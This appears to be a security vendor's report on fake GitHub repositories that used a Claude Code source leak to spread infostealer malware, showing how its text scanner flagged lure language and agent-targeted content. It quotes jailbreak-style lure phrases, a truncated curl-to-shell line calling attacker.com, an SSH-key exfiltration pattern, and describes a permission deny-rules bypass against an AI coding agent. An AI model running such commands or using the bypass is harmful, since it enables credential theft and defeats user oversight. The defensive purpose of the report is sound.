How We Detected the Claude Code Supply Chain Attack
7 Threats Caught and Blocked in ~10 Milliseconds Across Trojanized GitHub Repositories
SUNGLASSES | April 5, 2026 | v0.2.3
Within days of the Claude Code source leak, attackers created fake GitHub repositories to distribute Vidar infostealer and GhostSocks proxy malware. We scanned the actual trojanized repository content with Sunglasses. The scanner caught 7 threat signals and blocked every file in roughly 10 milliseconds.
Why This Matters
The news said "LEAK." We're here to explain what that actually means.
Over a dozen major security outlets covered the Claude Code malware campaign. Their reports are thorough — binary analysis, C2 infrastructure, threat actor attribution. But most people read the headline and think: "Should I be worried? What actually happened? What does this look like?"
That's what this report is for. We took the real attack materials, ran them through Sunglasses (our open-source content-layer security filter), and broke down exactly what was hiding in those fake repositories — in both technical detail and plain English. We show what the attacks look like, explain why they're dangerous, and demonstrate how content-layer filtering catches them before a human clicks download or an AI agent ingests the content.
4
CRITICAL
3
HIGH
4/4
FILES BLOCKED
~10ms
TOTAL SCAN TIME
The Attack Timeline: From Leak to Malware
March 31, 2026 — The Leak
A 59.8MB JavaScript source map is included in the Claude Code npm package (v2.1.88) due to a packaging error. Within hours, researcher Chaofan Shou discovers and posts the link. 512,000 lines of TypeScript are exposed publicly.
March 31, 2026 — Within 24 Hours
Threat actors create fake GitHub repositories under organization accounts, using the leak as a lure. READMEs promise "leaked source code" and "unlocked enterprise features." GitHub Releases host trojanized .7z archives.
April 1, 2026 — Malware Active
The repository leaked-claude-code/leaked-claude-code is live on GitHub. It distributes ClaudeCode_x64.exe — a Rust-based dropper that installs Vidar v18.7 (infostealer) and GhostSocks (proxy malware). Downloads recorded via GitHub Releases.
April 1, 2026 — Adversa AI Disclosure
Security firm Adversa AI publicly discloses a Claude Code permission bypass vulnerability — the "50-subcommand" deny-rules bypass. This adds a second attack vector to the ecosystem fallout.
April 2-4, 2026 — Press Coverage
The Register, BleepingComputer, Trend Micro, SecurityWeek, TechRadar, Bitdefender, and others publish coverage of the malware campaign.
April 5, 2026 — SUNGLASSES Scan
We scan the actual attack materials. Sunglasses catches 7 threat signals across 4 files. All blocked. Every finding mapped to specific detection rules. Total scan time: ~10ms.
What We Scanned
We collected text-based content from two sources tied to the Claude Code security fallout:
1. Trojanized Claude Code Repository
The fake leaked-claude-code/leaked-claude-code GitHub repository that uses the real leak as bait to distribute malware. We extracted the README content and supporting text — the social engineering layer that convinces people to download the malicious .exe.
2. Adversa AI Deny-Rules Bypass
The attack code from Adversa AI's disclosure showing how Claude Code's permission system can be bypassed with 50+ subcommands. This is the prompt-layer attack that targets trust assumptions inside the AI assistant itself.
What we did NOT do: We did not download or execute the ClaudeCode_x64.exe binary. Sunglasses scans text content (READMEs, code, prompts, docs) for attack patterns. Binary malware analysis is handled by antivirus tools. Our role is catching the social engineering and code-level threats that trick humans and AI agents before the binary is ever downloaded.
Matched: "jailbreak mode enabled" • "no limits, jailbreak mode" • "enterprise features unlocked"
The fake repository's README uses classic jailbreak terminology to attract users looking for Claude Code bypasses. It claims "no censorship," "no limits," and "enterprise-level features unlocked" — social engineering designed to override caution. Sunglasses flagged this across 3 of 4 scanned files.
What does this mean in plain English?
"It's like a storefront with a giant FREE sign — the words themselves are the warning."
This is a type of social engineering attack — scammers use specific language to get you excited and turn off your critical thinking. Words like "no limits," "unlocked," "free enterprise features" are bait. No legitimate software project talks like this. This technique is commonly used in GitHub malware campaigns where attackers create fake repositories that look real.
Sunglasses detects this using prompt injection pattern matching — a database of known scam phrases that gets checked automatically, the same way your email spam filter catches "You've won $1,000,000!" without you reading every email.
Real-world example: Imagine someone offers you a "free unlocked iPhone with no restrictions." You'd know that's a scam. This is the same thing, but for software — and developers fall for it because the technical language around it looks convincing. This specific attack targeted people searching for the Claude Code source code leak on GitHub.
CRITICALGLS-CI-001: Dangerous shell commands
Category: command_injection | Found in: Adversa Bypass, Attack Patterns
Matched: curl -s https://attacker.com/co...
The Adversa AI bypass contains shell commands designed to be executed by the AI agent — including curl piped to execution. This type of content, if ingested by an AI coding agent without scanning, could lead to command execution with the user's permissions. AI agents that process repository content as context are especially vulnerable to embedded shell commands.
What does this mean in plain English?
"It's like someone slipping a note into your to-do list that says: go to this address and do whatever they tell you."
The command curl downloads something from the internet. When it's piped to execution, your computer runs whatever it downloaded — no questions asked. This is called command injection — one of the most dangerous types of AI agent security threats in 2026. You wouldn't open a random attachment from a stranger's email. This is the same thing, hidden inside code that looks normal.
Why it's dangerous with AI coding agents: Tools like Claude Code, Cursor, and other AI coding assistants read repository content as context. If a repo contains this command, the AI might suggest running it as part of a normal workflow. The AI doesn't know it's malicious — it just sees code. This is why pre-ingestion scanning at the content layer matters — catching dangerous commands before an AI agent ever sees them.
The attack material contains instructions to read SSH private keys, Base64-encode them, and send them to an external server. This targets the most sensitive credential on a developer's machine. An AI coding agent that ingests this content as context could interpret these instructions as legitimate code, making pre-ingestion scanning critical.
What does this mean in plain English?
"It's like someone copying your house key, disguising it as a photo, and mailing it to themselves."
Your SSH key is a digital master key. Developers use it to access their servers, their GitHub account, their cloud infrastructure — everything. This attack reads that key from your computer, converts it to text (Base64 encoding — think of it as putting the key in an envelope), and sends it to a hacker's server. This technique is called credential exfiltration — stealing your login credentials without you knowing.
What happens next: With your SSH key, an attacker can log into your servers as if they were you. They can steal your code, delete your projects, or use your infrastructure to attack others. This is how major supply chain attacks like the axios RAT incident work — one stolen credential can compromise entire organizations.
How Sunglasses catches it: The scanner recognizes the pattern of "read a sensitive file + encode it + send it somewhere" — that combination is almost never legitimate. This is one of 75 attack patterns in the Sunglasses database. It flags the threat before any AI agent or human acts on it.
Why This Attack Is Different: One Text Surface, Two Victim Types
What makes this campaign especially important is that the same repository text can target two victims at once:
The human developer — persuaded by urgency, exclusivity, and "unlocked" language to download a malicious binary
The AI coding agent — ingesting the repository's embedded commands, credential-theft instructions, and permission-bypass content as trusted context
The README is not just documentation anymore. It is part of the attack surface. This is a hybrid attack where social engineering and prompt-layer abuse coexist in the same artifact.
Detection coverage: Sunglasses triggered 3 distinct rule families across 2 attack planes — social-engineering lure content (jailbreak roleplay) and agent-execution content (command injection + credential exfiltration) — across all 4 files. These were not seven random keyword hits. They were structured detections covering both sides of the hybrid attack.
The most important concept here is trusted-distribution mismatch: attackers borrowed GitHub's trust surface and the real Claude Code leak narrative to make malicious text look like legitimate developer documentation. Users think they are evaluating a code repository. In reality, they are evaluating a delivery channel designed to look like one.
This attack pattern is reusable. The campaign model works across every high-attention AI tool: leak or rumor → fake repo → "unlocked" framing → download lure for humans → embedded instructions for agents → credential theft after trust is won. Claude Code is the current lure. It will not be the last one.
What the Trojanized Repository Actually Does
While Sunglasses blocks the text-layer threats, here's what happens if someone downloads and runs the actual binary without content-layer filtering:
The Social Engineering Trap
README mixes real leak information with fake "unlocked Claude Code" claims
A large clickable banner image links directly to the malicious .7z download
Installation instructions tell victims to run ClaudeCode_x64.exe directly
Claims the API key is "securely stored using Windows Credential Manager" (likely credential theft)
A fake disclaimer labels it as "experimental security research" to add legitimacy
The Payload: Vidar v18.7 + GhostSocks
Vidar — Commodity infostealer that harvests saved passwords, browser cookies, cryptocurrency wallet credentials, credit card data, and autofill entries
GhostSocks — Turns infected machines into proxy infrastructure that criminals use to mask their location and route malicious traffic through victim computers
According to Trend Micro, this is part of a rotating-lure operation active since February 2026, impersonating more than 25 software brands while delivering the same Rust-compiled infostealer payload. The Claude Code leak gave them a fresh, high-attention lure.
The Bigger Picture: Why AI Tool Leaks Create Instant Attack Surface
The real story is not "one vendor had a bad week." The real story is:
Leaked AI tool ecosystems create instant phishing and malware opportunities. When a popular tool's source leaks, the attention spike is a goldmine for social engineering.
Prompt-layer bypasses and supply-chain lures stack together. The Adversa bypass targets the AI assistant's trust model. The fake repos target the human's trust. Together, they create a layered attack chain.
Agent operators need a trust filter between raw artifacts and execution. AI coding agents ingest READMEs, docs, issues, and code. Without pre-ingestion scanning, attack content flows directly into model context.
When a widely-used tool like Claude Code has a security event, the downstream blast radius includes:
Fake repos appearing in Google results within hours
Social engineering calibrated to developer urgency
Malware distributed through trusted platforms (GitHub Releases)
AI-targeted bypasses designed to exploit the tool's permission model
This is exactly what multi-agent teams will face at scale. For teams running multiple AI agents, this kind of artifact should never move directly from an untrusted repo, feed, or inbox into a higher-trust assistant. The safe pattern is scan-before-ingest: filter the content, record the findings, quarantine suspicious material, and only then decide whether the raw artifact should cross the next trust boundary. A defensive layer that can do this in milliseconds can sit inline before every agent inbox, every CLI suggestion, every repo ingestion.
The binary is only the last mile of the attack. The first compromise happens in the text — the README, the install instructions, the bypass guide. That's the content layer, and that's where filtering matters most.
Defensive Takeaways
For Developers
Do not trust "leaked-code" repositories or forks — treat them as hostile until verified
Inspect README and install instructions for social engineering, not just the code
Claude Code is officially distributed via Anthropic's native installer, npm, Homebrew, and WinGet. There is no legitimate standalone .exe download from GitHub Releases
If you see "jailbreak mode," "no limits," or "enterprise unlocked" in a repo — it's a trap
For AI Agent Teams
Put a content filter in front of repo ingestion and shared-file bridges
Treat READMEs, issue threads, install guides, and leaked-code summaries as executable influence, not harmless text
Separate low-trust ingestion from high-trust planning — untrusted artifacts should be scanned and summarized before reaching a more privileged agent
Quarantine HTML, scripts, archives, and unknown formats by default
Assume malware delivery and prompt bypass content can be bundled together in the same artifact
For Security Teams
Monitor for fake repositories after any major tool leak or security event
After any major AI-tool leak, watch for lure language patterns: "unlocked," "no limits," "enterprise features," and permission-bypass walkthroughs
The attack surface now includes natural-language content, not just executables
Content-layer filtering complements antivirus — antivirus handles binaries, content filters handle the social engineering and prompt injection layer
Speed matters: inline filtering at agent boundaries requires millisecond-level performance
Honest Assessment: What We Catch and What We Don't
What SUNGLASSES v0.2.3 catches in this case:
Jailbreak and social engineering language in READMEs and docs
Binary malware analysis (the .exe itself — that's antivirus territory)
Network behavior analysis (C2 communication, DNS callbacks)
Obfuscated payloads using heavy encoding or encryption
Zero-day exploits with no known pattern signature
Why we publish what we miss: Security tools that claim 100% detection are lying. We tell you exactly what we catch and what we don't. That's how trust works. Sunglasses handles the content and social engineering layer. Antivirus handles binaries. Together, they cover more surface.
Press Coverage: Who Reported This Attack
The following outlets have covered the Claude Code malware campaign. These outlets reported on the attack itself — none have reviewed or endorsed Sunglasses or this scan report.
4 text-based samples extracted from attack materials
Sample Sources
GitHub repository content (README, code), Adversa AI disclosure (public), aggregated threat intelligence. Samples were collected from known, publicly reported attack materials — not a blind test. Our goal is to show what these attacks look like, explain them clearly, and demonstrate content-layer filtering in action.
Data Sent Externally
None. Everything runs locally. No cloud. No telemetry.
Pick an attack example below and see how Sunglasses filters it. Dangerous content goes in. Clean verdict comes out. Your agent never sees the bad stuff.
Content IN
Click a button above to see an attack example...
→
Verdict OUT
Waiting for input...
How does this work in real life?
Install once. Protected forever. Update daily for new threats.
Step 1: Install — One command: pip install sunglasses. Done. Your agent now has a protection layer.
Step 2: Integrate — Add two lines of code to your agent's pipeline. Every piece of content passes through Sunglasses before your agent sees it. Bad content gets blocked. Clean content passes through. Your agent never touches the dangerous stuff.
from sunglasses import scan
result = scan(incoming_text)
if result.decision == "allow":
agent.process(incoming_text) # clean, safe
else:
quarantine(incoming_text) # blocked, agent never sees it
Step 3: Stay protected — Run pip install --upgrade sunglasses regularly. We regularly add new attack patterns and keywords to the database as new threats emerge. New threats appear daily — your protection layer should grow with them.
"It's like sunglasses blocking UV light. You put them on once. The UV never reaches your eyes. You just need to make sure your lenses are up to date with the latest UV protection."
Your terminal can be closed. Your VM can be stopped. Your Docker container can be off. The protection is in your code — it runs whenever your agent runs. Set it up once, keep upgrading the pattern database, and your agent stays protected.
Filter your repos before your AI agent reads them.
Free. Open source. Runs locally. 75 patterns. Milliseconds.
Disclaimer: Sunglasses is a content-layer security filter. It scans text for known attack patterns and returns ALLOW or BLOCK verdicts. When integrated into an agent pipeline, blocked content is filtered out before it reaches the AI agent. Sunglasses does not perform binary malware analysis or network monitoring — it protects the content layer (text, prompts, docs, code). Binary threats are handled by antivirus tools.
SUNGLASSES is a free, open-source AI agent security project. Not affiliated with Anthropic, OpenAI, Google, or GitHub.
Attack materials obtained from public repositories and public security research disclosures. No malware was executed.
Report published April 5, 2026 by the SUNGLASSES project.